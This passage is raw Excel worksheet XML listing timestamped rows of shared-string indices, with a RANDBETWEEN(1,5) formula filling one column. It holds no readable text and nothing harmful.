    <row r="3067" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A3067" s="1">
        <v>43501.395428240743</v>
      </c>
      <c r="B3067" t="s">
        <v>5</v>
      </c>
      <c r="C3067" t="s">
        <v>10</v>
      </c>
      <c r="D3067" t="s">
        <v>23</v>
      </c>
      <c r="E3067" s="2" t="s">
        <v>2995</v>
      </c>
      <c r="F3067">
        <f t="shared" ca="1" si="47"/>
        <v>4</v>
      </c>
    </row>
    <row r="3068" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A3068" s="1">
        <v>43501.389351851853</v>
      </c>
      <c r="B3068" t="s">
        <v>13</v>
      </c>
      <c r="C3068" t="s">
        <v>6</v>
      </c>
      <c r="D3068" t="s">
        <v>25</v>
      </c>
      <c r="E3068" s="2" t="s">
        <v>2996</v>
      </c>
      <c r="F3068">
        <f t="shared" ca="1" si="47"/>
        <v>3</v>
      </c>
    </row>
    <row r="3069" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A3069" s="1">
        <v>43501.386423611111</v>
      </c>
      <c r="B3069" t="s">
        <v>5</v>
      </c>
      <c r="C3069" t="s">
        <v>107</v>
      </c>
      <c r="E3069" s="2" t="s">
        <v>2997</v>
      </c>
      <c r="F3069">
        <f t="shared" ca="1" si="47"/>
        <v>1</v>
      </c>
    </row>
    <row r="3070" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A3070" s="1">
        <v>43501.377604166664</v>
      </c>
      <c r="B3070" t="s">
        <v>13</v>
      </c>
      <c r="C3070" t="s">
        <v>10</v>
      </c>
      <c r="D3070" t="s">
        <v>263</v>
      </c>
      <c r="E3070" s="2" t="s">
        <v>2998</v>
      </c>
      <c r="F3070">
        <f t="shared" ca="1" si="47"/>
        <v>3</v>
      </c>
    </row>
    <row r="3071" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3071" s="1">
        <v>43501.368969907409</v>
      </c>
      <c r="B3071" t="s">
        <v>19</v>
      </c>
      <c r="C3071" t="s">
        <v>10</v>
      </c>
      <c r="D3071" t="s">
        <v>52</v>
      </c>
      <c r="E3071" t="s">
        <v>2999</v>
      </c>
      <c r="F3071">
        <f t="shared" ca="1" si="47"/>
        <v>3</v>
      </c>
    </row>
    <row r="3072" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3072" s="1">
        <v>43501.330960648149</v>
      </c>
      <c r="B3072" t="s">
        <v>13</v>
      </c>
      <c r="C3072" t="s">
        <v>6</v>
      </c>
      <c r="D3072" t="s">
        <v>25</v>
      </c>
      <c r="E3072" t="s">
        <v>3000</v>
      </c>
      <c r="F3072">
        <f t="shared" ca="1" si="47"/>
        <v>4</v>
      </c>
    </row>
    <row r="3073" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A3073" s="1">
        <v>43501.324872685182</v>
      </c>
      <c r="B3073" t="s">
        <v>19</v>
      </c>
      <c r="C3073" t="s">
        <v>48</v>
      </c>
      <c r="E3073" s="2" t="s">
        <v>3001</v>
      </c>
      <c r="F3073">
        <f t="shared" ca="1" si="47"/>
        <v>5</v>
      </c>
    </row>
    <row r="3074" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3074" s="1">
        <v>43501.314085648148</v>
      </c>
      <c r="B3074" t="s">
        <v>5</v>
      </c>
      <c r="C3074" t="s">
        <v>563</v>
      </c>
      <c r="E3074" s="2" t="s">
        <v>3002</v>
      </c>
      <c r="F3074">
        <f t="shared" ref="F3074:F3137" ca="1" si="48">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="3075" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A3075" s="1">
        <v>43501.299120370371</v>
      </c>
      <c r="B3075" t="s">
        <v>5</v>
      </c>
      <c r="C3075" t="s">
        <v>71</v>
      </c>
      <c r="E3075" s="2" t="s">
        <v>3003</v>
      </c>
      <c r="F3075">
        <f t="shared" ca="1" si="48"/>
        <v>4</v>
      </c>
    </row>
    <row r="3076" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3076" s="1">
        <v>43501.298217592594</v>
      </c>
      <c r="B3076" t="s">
        <v>19</v>
      </c>
      <c r="C3076" t="s">
        <v>65</v>
      </c>
      <c r="F3076">
        <f t="shared" ca="1" si="48"/>
        <v>4</v>
      </c>
    </row>
    <row r="3077" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A3077" s="1">
        <v>43501.290578703702</v>
      </c>
      <c r="B3077" t="s">
        <v>19</v>
      </c>
      <c r="C3077" t="s">
        <v>48</v>
      </c>
      <c r="E3077" s="2" t="s">
        <v>3004</v>
      </c>
      <c r="F3077">
        <f t="shared" ca="1" si="48"/>
        <v>1</v>
      </c>
    </row>
    <row r="3078" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A3078" s="1">
        <v>43501.283541666664</v>
      </c>
      <c r="B3078" t="s">
        <v>13</v>
      </c>
      <c r="C3078" t="s">
        <v>41</v>
      </c>
      <c r="E3078" s="2" t="s">
        <v>3005</v>
      </c>
      <c r="F3078">
        <f t="shared" ca="1" si="48"/>
        <v>1</v>
      </c>
    </row>
    <row r="3079" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3079" s="1">
        <v>43501.246840277781</v>
      </c>
      <c r="B3079" t="s">
        <v>5</v>
      </c>
      <c r="C3079" t="s">
        <v>471</v>
      </c>
      <c r="E3079" t="s">
        <v>3006</v>
      </c>
      <c r="F3079">
        <f t="shared" ca="1" si="48"/>
        <v>1</v>
      </c>
    </row>
    <row r="3080" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3080" s="1">
        <v>43501.229699074072</v>
      </c>
      <c r="B3080" t="s">
        <v>19</v>
      </c>
      <c r="C3080" t="s">
        <v>48</v>
      </c>
      <c r="E3080" t="s">
        <v>3007</v>
      </c>
      <c r="F3080">
        <f t="shared" ca="1" si="48"/>
        <v>1</v>
      </c>
    </row>
    <row r="3081" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3081" s="1">
        <v>43501.227395833332</v>
      </c>
      <c r="B3081" t="s">
        <v>35</v>
      </c>
      <c r="C3081" t="s">
        <v>226</v>
      </c>
      <c r="E3081" t="s">
        <v>3008</v>
      </c>
      <c r="F3081">
        <f t="shared" ca="1" si="48"/>
        <v>4</v>
      </c>
    </row>
    <row r="3082" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A3082" s="1">
        <v>43501.221932870372</v>
      </c>
      <c r="B3082" t="s">
        <v>5</v>
      </c>
      <c r="C3082" t="s">
        <v>50</v>
      </c>
      <c r="E3082" s="2" t="s">
        <v>3009</v>
      </c>
      <c r="F3082">
        <f t="shared" ca="1" si="48"/>
        <v>5</v>
      </c>
    </row>
    <row r="3083" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A3083" s="1">
        <v>43501.20888888889</v>
      </c>
      <c r="B3083" t="s">
        <v>1305</v>
      </c>
      <c r="C3083" t="s">
        <v>65</v>
      </c>
      <c r="E3083" s="2" t="s">
        <v>3010</v>
      </c>
      <c r="F3083">
        <f t="shared" ca="1" si="48"/>
        <v>1</v>
      </c>
    </row>
    <row r="3084" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3084" s="1">
        <v>43501.189583333333</v>
      </c>
      <c r="B3084" t="s">
        <v>19</v>
      </c>
      <c r="C3084" t="s">
        <v>1510</v>
      </c>
      <c r="E3084" t="s">
        <v>3011</v>
      </c>
      <c r="F3084">
        <f t="shared" ca="1" si="48"/>
        <v>1</v>
      </c>
    </row>
    <row r="3085" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A3085" s="1">
        <v>43501.172962962963</v>
      </c>
      <c r="B3085" t="s">
        <v>5</v>
      </c>
      <c r="C3085" t="s">
        <v>836</v>
      </c>
      <c r="E3085" s="2" t="s">
        <v>3012</v>
      </c>
      <c r="F3085">
        <f t="shared" ca="1" si="48"/>
        <v>5</v>
      </c>
    </row>
    <row r="3086" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A3086" s="1">
        <v>43501.132662037038</v>
      </c>
      <c r="B3086" t="s">
        <v>13</v>
      </c>
      <c r="C3086" t="s">
        <v>43</v>
      </c>
      <c r="E3086" s="2" t="s">
        <v>3013</v>
      </c>
      <c r="F3086">
        <f t="shared" ca="1" si="48"/>
        <v>5</v>
      </c>
    </row>
    <row r="3087" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3087" s="1">
        <v>43501.131932870368</v>
      </c>
      <c r="B3087" t="s">
        <v>13</v>
      </c>
      <c r="C3087" t="s">
        <v>318</v>
      </c>
      <c r="E3087" t="s">
        <v>3014</v>
      </c>
      <c r="F3087">
        <f t="shared" ca="1" si="48"/>
        <v>5</v>
      </c>
    </row>
    <row r="3088" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A3088" s="1">
        <v>43501.123854166668</v>
      </c>
      <c r="B3088" t="s">
        <v>19</v>
      </c>
      <c r="C3088" t="s">
        <v>71</v>
      </c>
      <c r="E3088" s="2" t="s">
        <v>3015</v>
      </c>
      <c r="F3088">
        <f t="shared" ca="1" si="48"/>
        <v>5</v>
      </c>
    </row>
    <row r="3089" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3089" s="1">
        <v>43501.116875</v>
      </c>
      <c r="B3089" t="s">
        <v>5</v>
      </c>
      <c r="C3089" t="s">
        <v>41</v>
      </c>
      <c r="E3089" t="s">
        <v>3016</v>
      </c>
      <c r="F3089">
        <f t="shared" ca="1" si="48"/>
        <v>5</v>
      </c>
    </row>
    <row r="3090" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3090" s="1">
        <v>43500.908391203702</v>
      </c>
      <c r="B3090" t="s">
        <v>13</v>
      </c>
      <c r="C3090" t="s">
        <v>10</v>
      </c>
      <c r="D3090" t="s">
        <v>6</v>
      </c>
      <c r="E3090" t="s">
        <v>3017</v>
      </c>
      <c r="F3090">
        <f t="shared" ca="1" si="48"/>
        <v>1</v>
      </c>
    </row>
    <row r="3091" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3091" s="1">
        <v>43500.906793981485</v>
      </c>
      <c r="B3091" t="s">
        <v>13</v>
      </c>
      <c r="C3091" t="s">
        <v>10</v>
      </c>
      <c r="D3091" t="s">
        <v>6</v>
      </c>
      <c r="E3091" t="s">
        <v>3018</v>
      </c>
      <c r="F3091">
        <f t="shared" ca="1" si="48"/>
        <v>3</v>
      </c>
    </row>
    <row r="3092" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3092" s="1">
        <v>43500.897974537038</v>
      </c>
      <c r="B3092" t="s">
        <v>13</v>
      </c>
      <c r="C3092" t="s">
        <v>10</v>
      </c>
      <c r="D3092" t="s">
        <v>6</v>
      </c>
      <c r="E3092" t="s">
        <v>3018</v>
      </c>
      <c r="F3092">
        <f t="shared" ca="1" si="48"/>
        <v>1</v>
      </c>
    </row>
    <row r="3093" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3093" s="1">
        <v>43500.879467592589</v>
      </c>
      <c r="B3093" t="s">
        <v>5</v>
      </c>
      <c r="C3093" t="s">
        <v>6</v>
      </c>
      <c r="D3093" t="s">
        <v>194</v>
      </c>
      <c r="E3093" t="s">
        <v>3019</v>
      </c>
      <c r="F3093">
        <f t="shared" ca="1" si="48"/>
        <v>1</v>
      </c>
    </row>
    <row r="3094" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A3094" s="1">
        <v>43500.841724537036</v>
      </c>
      <c r="B3094" t="s">
        <v>35</v>
      </c>
      <c r="C3094" t="s">
        <v>222</v>
      </c>
      <c r="E3094" s="2" t="s">
        <v>3020</v>
      </c>
      <c r="F3094">
        <f t="shared" ca="1" si="48"/>
        <v>1</v>
      </c>
    </row>
    <row r="3095" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3095" s="1">
        <v>43500.782013888886</v>
      </c>
      <c r="B3095" t="s">
        <v>13</v>
      </c>
      <c r="C3095" t="s">
        <v>6</v>
      </c>
      <c r="D3095" t="s">
        <v>821</v>
      </c>
      <c r="E3095" s="2" t="s">
        <v>3021</v>
      </c>
      <c r="F3095">
        <f t="shared" ca="1" si="48"/>
        <v>3</v>
      </c>
    </row>
    <row r="3096" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3096" s="1">
        <v>43500.75644675926</v>
      </c>
      <c r="B3096" t="s">
        <v>1305</v>
      </c>
      <c r="C3096" t="s">
        <v>140</v>
      </c>
      <c r="D3096" t="s">
        <v>141</v>
      </c>
      <c r="E3096" t="s">
        <v>3022</v>
      </c>
      <c r="F3096">
        <f t="shared" ca="1" si="48"/>
        <v>2</v>
      </c>
    </row>
    <row r="3097" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3097" s="1">
        <v>43500.735717592594</v>
      </c>
      <c r="B3097" t="s">
        <v>35</v>
      </c>
      <c r="C3097" t="s">
        <v>10</v>
      </c>
      <c r="D3097" t="s">
        <v>14</v>
      </c>
      <c r="E3097" s="2" t="s">
        <v>3023</v>
      </c>
      <c r="F3097">
        <f t="shared" ca="1" si="48"/>
        <v>2</v>
      </c>
    </row>
    <row r="3098" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3098" s="1">
        <v>43500.716921296298</v>
      </c>
      <c r="B3098" t="s">
        <v>13</v>
      </c>
      <c r="C3098" t="s">
        <v>10</v>
      </c>
      <c r="D3098" t="s">
        <v>36</v>
      </c>
      <c r="E3098" t="s">
        <v>3024</v>
      </c>
      <c r="F3098">
        <f t="shared" ca="1" si="48"/>
        <v>1</v>
      </c>
    </row>
    <row r="3099" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3099" s="1">
        <v>43500.7028125</v>
      </c>
      <c r="B3099" t="s">
        <v>19</v>
      </c>
      <c r="C3099" t="s">
        <v>10</v>
      </c>
      <c r="D3099" t="s">
        <v>6</v>
      </c>
      <c r="E3099" t="s">
        <v>3025</v>
      </c>
      <c r="F3099">
        <f t="shared" ca="1" si="48"/>
        <v>2</v>
      </c>
    </row>
    <row r="3100" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3100" s="1">
        <v>43500.69703703704</v>
      </c>
      <c r="B3100" t="s">
        <v>13</v>
      </c>
      <c r="C3100" t="s">
        <v>10</v>
      </c>
      <c r="D3100" t="s">
        <v>251</v>
      </c>
      <c r="E3100" t="s">
        <v>3026</v>
      </c>
      <c r="F3100">
        <f t="shared" ca="1" si="48"/>
        <v>4</v>
      </c>
    </row>
    <row r="3101" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3101" s="1">
        <v>43500.683692129627</v>
      </c>
      <c r="B3101" t="s">
        <v>5</v>
      </c>
      <c r="C3101" t="s">
        <v>3027</v>
      </c>
      <c r="E3101" t="s">
        <v>3028</v>
      </c>
      <c r="F3101">
        <f t="shared" ca="1" si="48"/>
        <v>4</v>
      </c>
    </row>
    <row r="3102" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A3102" s="1">
        <v>43500.672511574077</v>
      </c>
      <c r="B3102" t="s">
        <v>19</v>
      </c>
      <c r="C3102" t="s">
        <v>6</v>
      </c>
      <c r="D3102" t="s">
        <v>602</v>
      </c>
      <c r="E3102" s="2" t="s">
        <v>3029</v>
      </c>
      <c r="F3102">
        <f t="shared" ca="1" si="48"/>
        <v>2</v>
      </c>
    </row>
    <row r="3103" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3103" s="1">
        <v>43500.670613425929</v>
      </c>
      <c r="B3103" t="s">
        <v>5</v>
      </c>
      <c r="C3103" t="s">
        <v>10</v>
      </c>
      <c r="D3103" t="s">
        <v>163</v>
      </c>
      <c r="E3103" t="s">
        <v>3030</v>
      </c>
      <c r="F3103">
        <f t="shared" ca="1" si="48"/>
        <v>4</v>
      </c>
    </row>
    <row r="3104" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A3104" s="1">
        <v>43500.668749999997</v>
      </c>
      <c r="B3104" t="s">
        <v>13</v>
      </c>
      <c r="C3104" t="s">
        <v>6</v>
      </c>
      <c r="D3104" t="s">
        <v>194</v>
      </c>
      <c r="E3104" s="2" t="s">
        <v>3031</v>
      </c>
      <c r="F3104">
        <f t="shared" ca="1" si="48"/>
        <v>1</v>
      </c>
    </row>
    <row r="3105" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3105" s="1">
        <v>43500.665868055556</v>
      </c>
      <c r="B3105" t="s">
        <v>35</v>
      </c>
      <c r="C3105" t="s">
        <v>10</v>
      </c>
      <c r="D3105" t="s">
        <v>52</v>
      </c>
      <c r="E3105" s="2" t="s">
        <v>3032</v>
      </c>
      <c r="F3105">
        <f t="shared" ca="1" si="48"/>
        <v>3</v>
      </c>
    </row>
    <row r="3106" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A3106" s="1">
        <v>43500.651331018518</v>
      </c>
      <c r="B3106" t="s">
        <v>19</v>
      </c>
      <c r="C3106" t="s">
        <v>10</v>
      </c>
      <c r="D3106" t="s">
        <v>107</v>
      </c>
      <c r="E3106" s="2" t="s">
        <v>3033</v>
      </c>
      <c r="F3106">
        <f t="shared" ca="1" si="48"/>
        <v>4</v>
      </c>
    </row>
    <row r="3107" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3107" s="1">
        <v>43500.648622685185</v>
      </c>
      <c r="B3107" t="s">
        <v>1305</v>
      </c>
      <c r="C3107" t="s">
        <v>10</v>
      </c>
      <c r="D3107" t="s">
        <v>20</v>
      </c>
      <c r="E3107" t="s">
        <v>3034</v>
      </c>
      <c r="F3107">
        <f t="shared" ca="1" si="48"/>
        <v>3</v>
      </c>
    </row>
    <row r="3108" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3108" s="1">
        <v>43500.643078703702</v>
      </c>
      <c r="B3108" t="s">
        <v>13</v>
      </c>
      <c r="C3108" t="s">
        <v>10</v>
      </c>
      <c r="D3108" t="s">
        <v>20</v>
      </c>
      <c r="E3108" t="s">
        <v>3035</v>
      </c>
      <c r="F3108">
        <f t="shared" ca="1" si="48"/>
        <v>3</v>
      </c>
    </row>
    <row r="3109" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3109" s="1">
        <v>43500.629560185182</v>
      </c>
      <c r="B3109" t="s">
        <v>13</v>
      </c>
      <c r="C3109" t="s">
        <v>6</v>
      </c>
      <c r="D3109" t="s">
        <v>25</v>
      </c>
      <c r="E3109" t="s">
        <v>3036</v>
      </c>
      <c r="F3109">
        <f t="shared" ca="1" si="48"/>
        <v>4</v>
      </c>
    </row>
    <row r="3110" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3110" s="1">
        <v>43500.629490740743</v>
      </c>
      <c r="B3110" t="s">
        <v>19</v>
      </c>
      <c r="C3110" t="s">
        <v>10</v>
      </c>
      <c r="D3110" t="s">
        <v>494</v>
      </c>
      <c r="E3110" t="s">
        <v>3037</v>
      </c>
      <c r="F3110">
        <f t="shared" ca="1" si="48"/>
        <v>4</v>
      </c>
    </row>
    <row r="3111" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A3111" s="1">
        <v>43500.625081018516</v>
      </c>
      <c r="B3111" t="s">
        <v>19</v>
      </c>
      <c r="C3111" t="s">
        <v>10</v>
      </c>
      <c r="D3111" t="s">
        <v>6</v>
      </c>
      <c r="E3111" s="2" t="s">
        <v>3038</v>
      </c>
      <c r="F3111">
        <f t="shared" ca="1" si="48"/>
        <v>2</v>
      </c>
    </row>
    <row r="3112" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3112" s="1">
        <v>43500.624097222222</v>
      </c>
      <c r="B3112" t="s">
        <v>1305</v>
      </c>
      <c r="C3112" t="s">
        <v>163</v>
      </c>
      <c r="E3112" t="s">
        <v>3039</v>
      </c>
      <c r="F3112">
        <f t="shared" ca="1" si="48"/>
        <v>3</v>
      </c>
    </row>
    <row r="3113" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3113" s="1">
        <v>43500.616909722223</v>
      </c>
      <c r="B3113" t="s">
        <v>19</v>
      </c>
      <c r="C3113" t="s">
        <v>10</v>
      </c>
      <c r="D3113" t="s">
        <v>158</v>
      </c>
      <c r="E3113" t="s">
        <v>3040</v>
      </c>
      <c r="F3113">
        <f t="shared" ca="1" si="48"/>
        <v>5</v>
      </c>
    </row>
    <row r="3114" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A3114" s="1">
        <v>43500.616099537037</v>
      </c>
      <c r="B3114" t="s">
        <v>1305</v>
      </c>
      <c r="C3114" t="s">
        <v>10</v>
      </c>
      <c r="D3114" t="s">
        <v>89</v>
      </c>
      <c r="E3114" s="2" t="s">
        <v>3041</v>
      </c>
      <c r="F3114">
        <f t="shared" ca="1" si="48"/>
        <v>5</v>
      </c>
    </row>
    <row r="3115" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A3115" s="1">
        <v>43500.614270833335</v>
      </c>
      <c r="B3115" t="s">
        <v>13</v>
      </c>
      <c r="C3115" t="s">
        <v>10</v>
      </c>
      <c r="D3115" t="s">
        <v>23</v>
      </c>
      <c r="E3115" s="2" t="s">
        <v>3042</v>
      </c>
      <c r="F3115">
        <f t="shared" ca="1" si="48"/>
        <v>3</v>
      </c>
    </row>
    <row r="3116" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3116" s="1">
        <v>43500.609398148146</v>
      </c>
      <c r="B3116" t="s">
        <v>5</v>
      </c>
      <c r="C3116" t="s">
        <v>10</v>
      </c>
      <c r="D3116" t="s">
        <v>6</v>
      </c>
      <c r="E3116" s="2" t="s">
        <v>3043</v>
      </c>
      <c r="F3116">
        <f t="shared" ca="1" si="48"/>
        <v>3</v>
      </c>
    </row>
    <row r="3117" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3117" s="1">
        <v>43500.605856481481</v>
      </c>
      <c r="B3117" t="s">
        <v>19</v>
      </c>
      <c r="C3117" t="s">
        <v>103</v>
      </c>
      <c r="E3117" t="s">
        <v>3045</v>
      </c>
      <c r="F3117">
        <f t="shared" ca="1" si="48"/>
        <v>4</v>
      </c>
    </row>
    <row r="3118" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3118" s="1">
        <v>43500.604490740741</v>
      </c>
      <c r="B3118" t="s">
        <v>5</v>
      </c>
      <c r="C3118" t="s">
        <v>10</v>
      </c>
      <c r="D3118" t="s">
        <v>39</v>
      </c>
      <c r="E3118" t="s">
        <v>3046</v>
      </c>
      <c r="F3118">
        <f t="shared" ca="1" si="48"/>
        <v>5</v>
      </c>
    </row>
    <row r="3119" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3119" s="1">
        <v>43500.597013888888</v>
      </c>
      <c r="B3119" t="s">
        <v>19</v>
      </c>
      <c r="C3119" t="s">
        <v>10</v>
      </c>
      <c r="D3119" t="s">
        <v>251</v>
      </c>
      <c r="E3119" t="s">
        <v>3047</v>
      </c>
      <c r="F3119">
        <f t="shared" ca="1" si="48"/>
        <v>4</v>
      </c>
    </row>
    <row r="3120" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3120" s="1">
        <v>43500.573240740741</v>
      </c>
      <c r="B3120" t="s">
        <v>1305</v>
      </c>
      <c r="C3120" t="s">
        <v>10</v>
      </c>
      <c r="D3120" t="s">
        <v>41</v>
      </c>
      <c r="E3120" t="s">
        <v>3048</v>
      </c>
      <c r="F3120">
        <f t="shared" ca="1" si="48"/>
        <v>4</v>
      </c>
    </row>
    <row r="3121" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3121" s="1">
        <v>43500.550034722219</v>
      </c>
      <c r="B3121" t="s">
        <v>5</v>
      </c>
      <c r="C3121" t="s">
        <v>3049</v>
      </c>
      <c r="E3121" t="s">
        <v>3050</v>
      </c>
      <c r="F3121">
        <f t="shared" ca="1" si="48"/>
        <v>1</v>
      </c>
    </row>
    <row r="3122" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3122" s="1">
        <v>43500.544062499997</v>
      </c>
      <c r="B3122" t="s">
        <v>13</v>
      </c>
      <c r="C3122" t="s">
        <v>10</v>
      </c>
      <c r="D3122" t="s">
        <v>89</v>
      </c>
      <c r="E3122" t="s">
        <v>3051</v>
      </c>
      <c r="F3122">
        <f t="shared" ca="1" si="48"/>
        <v>3</v>
      </c>
    </row>
    <row r="3123" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3123" s="1">
        <v>43500.533425925925</v>
      </c>
      <c r="B3123" t="s">
        <v>1305</v>
      </c>
      <c r="C3123" t="s">
        <v>6</v>
      </c>
      <c r="D3123" t="s">
        <v>25</v>
      </c>
      <c r="E3123" t="s">
        <v>3052</v>
      </c>
      <c r="F3123">
        <f t="shared" ca="1" si="48"/>
        <v>4</v>
      </c>
    </row>
    <row r="3124" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A3124" s="1">
        <v>43500.523784722223</v>
      </c>
      <c r="B3124" t="s">
        <v>5</v>
      </c>
      <c r="C3124" t="s">
        <v>430</v>
      </c>
      <c r="E3124" s="2" t="s">
        <v>3053</v>
      </c>
      <c r="F3124">
        <f t="shared" ca="1" si="48"/>
        <v>4</v>
      </c>
    </row>
    <row r="3125" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3125" s="1">
        <v>43500.522905092592</v>
      </c>
      <c r="B3125" t="s">
        <v>13</v>
      </c>
      <c r="C3125" t="s">
        <v>10</v>
      </c>
      <c r="D3125" t="s">
        <v>178</v>
      </c>
      <c r="E3125" t="s">
        <v>3054</v>
      </c>
      <c r="F3125">
        <f t="shared" ca="1" si="48"/>
        <v>5</v>
      </c>
    </row>
    <row r="3126" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3126" s="1">
        <v>43500.513564814813</v>
      </c>
      <c r="B3126" t="s">
        <v>19</v>
      </c>
      <c r="C3126" t="s">
        <v>10</v>
      </c>
      <c r="D3126" t="s">
        <v>80</v>
      </c>
      <c r="E3126" t="s">
        <v>3055</v>
      </c>
      <c r="F3126">
        <f t="shared" ca="1" si="48"/>
        <v>2</v>
      </c>
    </row>
    <row r="3127" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A3127" s="1">
        <v>43500.495405092595</v>
      </c>
      <c r="B3127" t="s">
        <v>5</v>
      </c>
      <c r="C3127" t="s">
        <v>253</v>
      </c>
      <c r="E3127" s="2" t="s">
        <v>3056</v>
      </c>
      <c r="F3127">
        <f t="shared" ca="1" si="48"/>
        <v>1</v>
      </c>
    </row>
    <row r="3128" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3128" s="1">
        <v>43500.49013888889</v>
      </c>
      <c r="B3128" t="s">
        <v>5</v>
      </c>
      <c r="C3128" t="s">
        <v>10</v>
      </c>
      <c r="D3128" t="s">
        <v>163</v>
      </c>
      <c r="E3128" s="2" t="s">
        <v>3057</v>
      </c>
      <c r="F3128">
        <f t="shared" ca="1" si="48"/>
        <v>2</v>
      </c>
    </row>
    <row r="3129" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A3129" s="1">
        <v>43500.480057870373</v>
      </c>
      <c r="B3129" t="s">
        <v>5</v>
      </c>
      <c r="C3129" t="s">
        <v>48</v>
      </c>
      <c r="E3129" s="2" t="s">
        <v>3058</v>
      </c>
      <c r="F3129">
        <f t="shared" ca="1" si="48"/>
        <v>5</v>
      </c>
    </row>
    <row r="3130" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3130" s="1">
        <v>43500.464930555558</v>
      </c>
      <c r="B3130" t="s">
        <v>19</v>
      </c>
      <c r="C3130" t="s">
        <v>10</v>
      </c>
      <c r="D3130" t="s">
        <v>271</v>
      </c>
      <c r="E3130" s="2" t="s">
        <v>3059</v>
      </c>
      <c r="F3130">
        <f t="shared" ca="1" si="48"/>
        <v>2</v>
      </c>
    </row>
    <row r="3131" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3131" s="1">
        <v>43500.458749999998</v>
      </c>
      <c r="B3131" t="s">
        <v>5</v>
      </c>
      <c r="C3131" t="s">
        <v>6</v>
      </c>
      <c r="D3131" t="s">
        <v>25</v>
      </c>
      <c r="E3131" t="s">
        <v>829</v>
      </c>
      <c r="F3131">
        <f t="shared" ca="1" si="48"/>
        <v>1</v>
      </c>
    </row>
    <row r="3132" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A3132" s="1">
        <v>43500.457789351851</v>
      </c>
      <c r="B3132" t="s">
        <v>5</v>
      </c>
      <c r="C3132" t="s">
        <v>71</v>
      </c>
      <c r="E3132" s="2" t="s">
        <v>3060</v>
      </c>
      <c r="F3132">
        <f t="shared" ca="1" si="48"/>
        <v>1</v>
      </c>
    </row>
    <row r="3133" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3133" s="1">
        <v>43500.456608796296</v>
      </c>
      <c r="B3133" t="s">
        <v>5</v>
      </c>
      <c r="C3133" t="s">
        <v>6</v>
      </c>
      <c r="D3133" t="s">
        <v>25</v>
      </c>
      <c r="E3133" t="s">
        <v>3061</v>
      </c>
      <c r="F3133">
        <f t="shared" ca="1" si="48"/>
        <v>5</v>
      </c>
    </row>
    <row r="3134" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3134" s="1">
        <v>43500.448298611111</v>
      </c>
      <c r="B3134" t="s">
        <v>13</v>
      </c>
      <c r="C3134" t="s">
        <v>10</v>
      </c>
      <c r="D3134" t="s">
        <v>112</v>
      </c>
      <c r="E3134" t="s">
        <v>3062</v>
      </c>
      <c r="F3134">
        <f t="shared" ca="1" si="48"/>
        <v>2</v>
      </c>
    </row>
    <row r="3135" spans="1:6" ht="345" x14ac:dyDescent="0.25">
